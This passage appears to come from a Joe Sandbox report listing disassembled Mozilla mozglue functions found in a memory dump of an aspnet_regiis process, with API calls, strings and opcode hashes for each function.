                                                                                                                              • Part of subcall function 6CC381B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CC381DE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                            • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                            • API String ID: 801438305-4149320968
                                                                                                                            • Opcode ID: 6b2649f076498071d19441ede49e89f70ead33051397f34f7897c507bc7f2568
                                                                                                                            • Instruction ID: b1b21774c3bbb1daed42c8107f0dec2ae747d217b092f16ee58b41ff83c06391
                                                                                                                            • Opcode Fuzzy Hash: 6b2649f076498071d19441ede49e89f70ead33051397f34f7897c507bc7f2568
                                                                                                                            • Instruction Fuzzy Hash: 7891DF70608740CFD724CF24C4A469EB7E1EF89358F14891DE59A9B751FB30D949CB62
                                                                                                                            Function 6CC89E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldiv__aullrem
                                                                                                                            • String ID: -Infinity$NaN
                                                                                                                            • API String ID: 3839614884-2141177498
                                                                                                                            • Opcode ID: 050005526a6d1434728557aa1d3a1057152f9312db1c515610de8afa34af46b7
                                                                                                                            • Instruction ID: f947ab0b572f63d716d02e8b49470fe60b4a72db4c941a68bd454c40277cf066
                                                                                                                            • Opcode Fuzzy Hash: 050005526a6d1434728557aa1d3a1057152f9312db1c515610de8afa34af46b7
                                                                                                                            • Instruction Fuzzy Hash: D6C19F31E01319DBDB14CFA9C8507DFBBB6BB84318F544529D406ABB80EB74A94ACB91
                                                                                                                            Function 6CC9545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CC98A4B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2221118986-0
                                                                                                                            • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                            • Instruction ID: 58251682c4787300889b8591ac77c28550e0713a54c1b3f14a43aadc0fecfe22
                                                                                                                            • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                            • Instruction Fuzzy Hash: 9CB1D772E0121A8FDB14CF68CC91BE9B7B2FF95314F1802A9C549EB791E7309985CB91
                                                                                                                            Function 6CC9542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CC988F0
                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CC9925C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2221118986-0
                                                                                                                            • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                            • Instruction ID: 616aa4bfac8b939ed3fe395b8cccb2a3620c388baaf0861dff5ae3a4a8f667aa
                                                                                                                            • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                            • Instruction Fuzzy Hash: 2BB1B572A0510A8FDB14CF58C891AEDB7B2EF85314F1402A9C549DBB85E730A999CB90
                                                                                                                            Function 6CC777A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC77A81
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC77A93
                                                                                                                              • Part of subcall function 6CC45C50: GetTickCount64.KERNEL32 ref: 6CC45D40
                                                                                                                              • Part of subcall function 6CC45C50: EnterCriticalSection.KERNEL32(6CCAF688), ref: 6CC45D67
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC77AA1
                                                                                                                              • Part of subcall function 6CC45C50: __aulldiv.LIBCMT ref: 6CC45DB4
                                                                                                                              • Part of subcall function 6CC45C50: LeaveCriticalSection.KERNEL32(6CCAF688), ref: 6CC45DED
                                                                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6CC77B31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4054851604-0
                                                                                                                            • Opcode ID: 3c4416e008f77ac604d2a5e1adad6e0889f40deb70b28a1d1ce171531fc71874
                                                                                                                            • Instruction ID: 534c518ea44c8fb77b86e36b997f662daf2422814a6bcc403cef2f49fc3ed8f7
                                                                                                                            • Opcode Fuzzy Hash: 3c4416e008f77ac604d2a5e1adad6e0889f40deb70b28a1d1ce171531fc71874
                                                                                                                            • Instruction Fuzzy Hash: 3EB1AE316083848BDB25CF25C45065FB7E2FFC9318F154A1CE99567B90EB70E90ADB92
                                                                                                                            Function 6CC855F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(user32,?,6CC5E1A5), ref: 6CC85606
                                                                                                                            • LoadLibraryW.KERNEL32(gdi32,?,6CC5E1A5), ref: 6CC8560F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CC85633
                                                                                                                            • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CC8563D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CC8566C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CC8567D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CC85696
                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CC856B2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CC856CB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CC856E4
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CC856FD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CC85716
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CC8572F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CC85748
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CC85761
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CC8577A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CC85793
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CC857A8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CC857BD
                                                                                                                            • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CC857D5
                                                                                                                            • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CC857EA
                                                                                                                            • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CC857FF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                            • API String ID: 2238633743-1964193996
                                                                                                                            • Opcode ID: 70c12590b2863d0942af9f566f0105e5e1be4bdaf5dbf8f6640e7fa63d710d77
                                                                                                                            • Instruction ID: 098dbec5e2eaa29b48ed3a87632936197ee697da86e35bfb2b21e87b237df66b
                                                                                                                            • Opcode Fuzzy Hash: 70c12590b2863d0942af9f566f0105e5e1be4bdaf5dbf8f6640e7fa63d710d77
                                                                                                                            • Instruction Fuzzy Hash: E65121716427079FEB019FF9AD6C96F3EF8AB063497504426A912E3A51FBB4CC018F60
                                                                                                                            Function 6CC6CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CC3582D), ref: 6CC6CC27
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CC3582D), ref: 6CC6CC3D
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CC9FE98,?,?,?,?,?,6CC3582D), ref: 6CC6CC56
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CC3582D), ref: 6CC6CC6C
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CC3582D), ref: 6CC6CC82
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CC3582D), ref: 6CC6CC98
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC3582D), ref: 6CC6CCAE
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CC6CCC4
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CC6CCDA
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CC6CCEC
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CC6CCFE
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CC6CD14
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CC6CD82
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CC6CD98
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CC6CDAE
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CC6CDC4
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CC6CDDA
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CC6CDF0
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CC6CE06
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CC6CE1C
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CC6CE32
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CC6CE48
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CC6CE5E
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CC6CE74
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CC6CE8A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: strcmp
                                                                                                                            • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                            • API String ID: 1004003707-2809817890
                                                                                                                            • Opcode ID: a211903002b23262c5d0606c97b7b300429eda976d8e4590b6fd52652decdacd
                                                                                                                            • Instruction ID: 76f001b0b9b8a150dcaa0bdebdc0067fd765d3845f72643ad48051adb2ac40d2
                                                                                                                            • Opcode Fuzzy Hash: a211903002b23262c5d0606c97b7b300429eda976d8e4590b6fd52652decdacd
                                                                                                                            • Instruction Fuzzy Hash: 9751DEE1A4922553FE003117AF90BEA1445FF5334AF50457AEF2AA1F80FF09D60A86B7
                                                                                                                            Function 6CC347C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CC34801
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC34817
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC3482D
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3484A
                                                                                                                              • Part of subcall function 6CC5AB3F: EnterCriticalSection.KERNEL32(6CCAE370,?,?,6CC23527,6CCAF6CC,?,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB49
                                                                                                                              • Part of subcall function 6CC5AB3F: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC23527,6CCAF6CC,?,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5AB7C
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC3485F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC3487E
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC3488B
                                                                                                                            • free.MOZGLUE(?), ref: 6CC3493A
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC34956
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC34960
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC3499A
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            • free.MOZGLUE(?), ref: 6CC349C6
                                                                                                                            • free.MOZGLUE(?), ref: 6CC349E9
                                                                                                                              • Part of subcall function 6CC45E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC45EDB
                                                                                                                              • Part of subcall function 6CC45E90: memset.VCRUNTIME140(6CC87765,000000E5,55CCCCCC), ref: 6CC45F27
                                                                                                                              • Part of subcall function 6CC45E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC45FB2
                                                                                                                            Strings
                                                                                                                            • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC34812
                                                                                                                            • MOZ_PROFILER_SHUTDOWN, xrefs: 6CC34A42
                                                                                                                            • [I %d/%d] profiler_shutdown, xrefs: 6CC34A06
                                                                                                                            • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC34828
                                                                                                                            • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC347FC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                                                            • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                                                            • API String ID: 1340022502-4194431170
                                                                                                                            • Opcode ID: 044255cbd55d1681dfbb053ff69fa1ec5135826a517821e794e4decc113e72a9
                                                                                                                            • Instruction ID: 616637a903ebde17f78b04d2ff7a6f5bc9f5f17de5f1c781c240974d4cb9cbda
                                                                                                                            • Opcode Fuzzy Hash: 044255cbd55d1681dfbb053ff69fa1ec5135826a517821e794e4decc113e72a9
                                                                                                                            • Instruction Fuzzy Hash: 3A81D371A001218FDB00DFA9F898B5E3BB5BF42318F141229D91A97F41F732E895CB96
                                                                                                                            Function 6CC34470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC34730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CC344B2,6CCAE21C,6CCAF7F8), ref: 6CC3473E
                                                                                                                              • Part of subcall function 6CC34730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CC3474A
                                                                                                                            • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CC344BA
                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CC344D2
                                                                                                                            • InitOnceExecuteOnce.KERNEL32(6CCAF80C,6CC2F240,?,?), ref: 6CC3451A
                                                                                                                            • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC3455C
                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 6CC34592
                                                                                                                            • InitializeCriticalSection.KERNEL32(6CCAF770), ref: 6CC345A2
                                                                                                                            • moz_xmalloc.MOZGLUE(00000008), ref: 6CC345AA
                                                                                                                            • moz_xmalloc.MOZGLUE(00000018), ref: 6CC345BB
                                                                                                                            • InitOnceExecuteOnce.KERNEL32(6CCAF818,6CC2F240,?,?), ref: 6CC34612
                                                                                                                            • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CC34636
                                                                                                                            • LoadLibraryW.KERNEL32(user32.dll), ref: 6CC34644
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC3466D
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC3469F
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC346AB
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC346B2
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC346B9
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC346C0
                                                                                                                            • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC346CD
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 6CC346F1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CC346FD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                            • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                            • API String ID: 1702738223-3894940629
                                                                                                                            • Opcode ID: 58d9fa09bfcafc3257402702b026dbcbe1b3cace9ee937cfd4fa5a20ad2e24bf
                                                                                                                            • Instruction ID: 28b12a59016f0780d77598d716d3f41e073e7c9b175b94985433065f22879fc4
                                                                                                                            • Opcode Fuzzy Hash: 58d9fa09bfcafc3257402702b026dbcbe1b3cace9ee937cfd4fa5a20ad2e24bf
                                                                                                                            • Instruction Fuzzy Hash: F961E5B0A00258AFEB10DFE1EC0DB997BB8EB47348F049558E5489B641F7B18985CFA1
                                                                                                                            Function 6CC6F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F70E
                                                                                                                            • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CC6F8F9
                                                                                                                              • Part of subcall function 6CC36390: GetCurrentThreadId.KERNEL32 ref: 6CC363D0
                                                                                                                              • Part of subcall function 6CC36390: AcquireSRWLockExclusive.KERNEL32 ref: 6CC363DF
                                                                                                                              • Part of subcall function 6CC36390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC3640E
